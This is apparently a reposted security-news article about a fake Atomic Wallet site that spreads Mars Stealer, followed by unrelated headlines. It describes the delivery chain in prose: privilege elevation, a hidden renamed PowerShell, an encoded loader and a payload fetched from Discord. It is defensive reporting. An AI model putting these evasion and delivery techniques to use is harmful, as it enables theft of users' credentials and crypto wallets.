atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

A fake website impersonating the official portal for the Atomic wallet, a popular decentralized wallet that also operates as a cryptocurrency exchange portal, is, in reality, distributing copies of the Mars Stealer information-stealing malware.

The phony website was disclosed by a malware researcher known as Dee on Monday, but at the time of writing this, it remains online, serving copies of the said malware.

Seeing the genuine and fake websites side by side reveals that the latter isn’t a faithful copy of the former, but it’s still using the official logos, themes, marketing images, and structure. The fake site even features a contact form, email address, and FAQ section.

However, those unfamiliar with the legitimate Atomic wallet site could easily believe that the imposter is authentic.

atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

Genuine site left, fake site right

As for how people end up there, it might be through malvertising on social media, direct messages on various platforms, SEO poisoning, or spam email.

Visitors attempting to download the software are presented with three buttons for Windows, iOS, and Android versions.

atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

The download page on the fake site

Clicking on iOS does nothing, and clicking the Google Play button redirects to the real Atomic Wallet app on the Play Store.

However, clicking on the Windows button will download a ZIP file named “Atomic Wallet.zip,” which contains malicious code that installs the Mars Stealer infection.

Mars Stealer is a recently-emerged info-stealer that targets account credentials stored on web browsers, cryptocurrency extensions and wallets, and two-factor authentication plugins.

In March, we reported about Mars Stealer being distributed by malvertizing campaigns on Google Ads that abused the OpenOffice brand.

Evading detection

According to a technical report published by Cyble yesterday, the delivery mechanism in the ongoing Mars Stealer campaign is characterized by a notable effort to evade detection.

The ZIP contains a batch file (AtomicWallet-Setup.bat) that invokes a PowerShell command to elevate its privileges on the host.

Next, the bat file copies the PowerShell executable (powershell.exe) in the directory, renames and hides it, and eventually uses it to execute a base64-encoded PowerShell content.

atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

Contents of the included bat file (Cyble)

This code decrypts an AES-encrypted and GZip compressed Base64-encoded code which executes the final PowerShell code that acts as the malware loader.

atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

Code for decryption and decompression (Cyble)

The loader downloads a copy of Mars Stealer from a Discord server and drops it on %LOCALAPPDATA% on the host machine. After installation, the malware launches and begins stealing data from the now-infected device.

atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

Downloading Mars Stealer from Discord (Cyble)

How to stay safe

When downloading cryptocurrency wallets, it is vital to make sure you are using the official download portal of the project and never trust links provided on social media or instant messaging platforms.

Also, beware of SEO poisoning and malicious Google Ads campaigns that can make malicious websites rank higher than the official sites in Google Search results, so skip all results marked as ads.

TECH NEWS RELATED

Cisco's networking chief Todd Nightingale to helm Fastly

Cisco said it will its enterprise and carrier groups under Jonathan Davidson, the current head of the carrier group.

View more: Cisco's networking chief Todd Nightingale to helm Fastly

Palo Alto debuts Unit 42 team for on-demand cyber security

Live expert service builds on Palo Alto’s Cortex extended detection and response (XDR) platform to provide more personalised, effective warnings.

View more: Palo Alto debuts Unit 42 team for on-demand cyber security

Apple warns its suppliers about China following Pelosi Taiwan visit

Ripple effects are continuing to multiply after the controversial visit of US House Speaker Nancy Pelosi to Taiwan just a few days ago. That visit sparked furious saber-rattling from China, for example, and even had some people fretting about WWIII. Fortunately, the worst-case fears about the Pelosi Taiwan visit ...

View more: Apple warns its suppliers about China following Pelosi Taiwan visit

James Gunn says Guardians of the Galaxy Vol 3. will be ‘incredibly emotional’

Guardians of the Galaxy Vol. 3 is one of the most anticipated movies of Phase 5, and the more we hear about its mysterious plot, the more exciting the sequel becomes. Vol. 3 was already exciting without any of the teasers from James Gunn or the leaked Comic-Con trailer ...

View more: James Gunn says Guardians of the Galaxy Vol 3. will be ‘incredibly emotional’

2022 iPad Pro could include pair of mystery ports

Mystery ports added the 2022 iPad Pro could be for a new version of MagSafe. Or maybe not. Photo: Apple Apple will add two new ports to the 2022 iPad Pro, according to an unconfirmed report. However, it’s not known what these will be for as they do not ...

View more: 2022 iPad Pro could include pair of mystery ports

Samsung’s Galaxy Z Fold 4 Won’t Have an S Pen Slot

Samsung via Equal Leaks Rumors suggested that the Galaxy Z Fold 4 could feature a dedicated S Pen slot, much like the Galaxy S22 Ultra or older Galaxy Note devices. But an accidental Amazon listing proves that the phone cannot hold an S Pen without an add-on case. The Amazon ...

View more: Samsung’s Galaxy Z Fold 4 Won’t Have an S Pen Slot

How to Enable Full Screen Caller ID in Truecaller

Even though you have plenty of apps for caller identification, the Truecaller is the most popular and offers many features. The caller identification app is available for both Android & iOS, and it keeps getting new features now and then. TrueCaller recognizes the calls and provides you options to ...

View more: How to Enable Full Screen Caller ID in Truecaller

Apple will announce iPhone 14 via another prerecorded video message

Apple has started working on the iPhone 14’s launch event. Photo: Killian Bell/Cult of Mac Apple has not held a physical launch event in over two years due to the pandemic. While COVID-19 cases are now well under control, Apple doesn’t plan to hold an in-person iPhone 14 event ...

View more: Apple will announce iPhone 14 via another prerecorded video message

This Cube Used to Be a 1967 Shelby Mustang GT500

CFTC Targets Election Betting Platform PredictIt

Fintech platform Scripbox makes strategic investment in Pune-based Wealth Managers

Russians Building a Satellite-Blinding Laser – An Expert Explains the Ominous Technology

Podcast #688 – Intel & AMD Financials, Ryzen 7000 Date, be quiet! Pure Base 500 FX, Sonos, 0-Day Hacks + MORE!

Samsung Galaxy Watch 5 Rumors: Will It Have Better Battery Life?

Toyota Offers to Buy Back bZ4X EVs with Wheels That Might Fall Off

Apple Delays iPadOS 16 Software Update To Focus on iPhone 14

Nepal Prepares to Issue Digital Currency, Drafts Necessary Amendments

Top 7 Ways to Fix Facebook Messenger Not Sending Videos

Granblue Fantasy Relink Is “At the Peak of Development;” New Glimpse of Gameplay Revealed

Spotify Finally Fixes Its Stupid Play Button

OTHER TECH NEWS

Top Car News Car News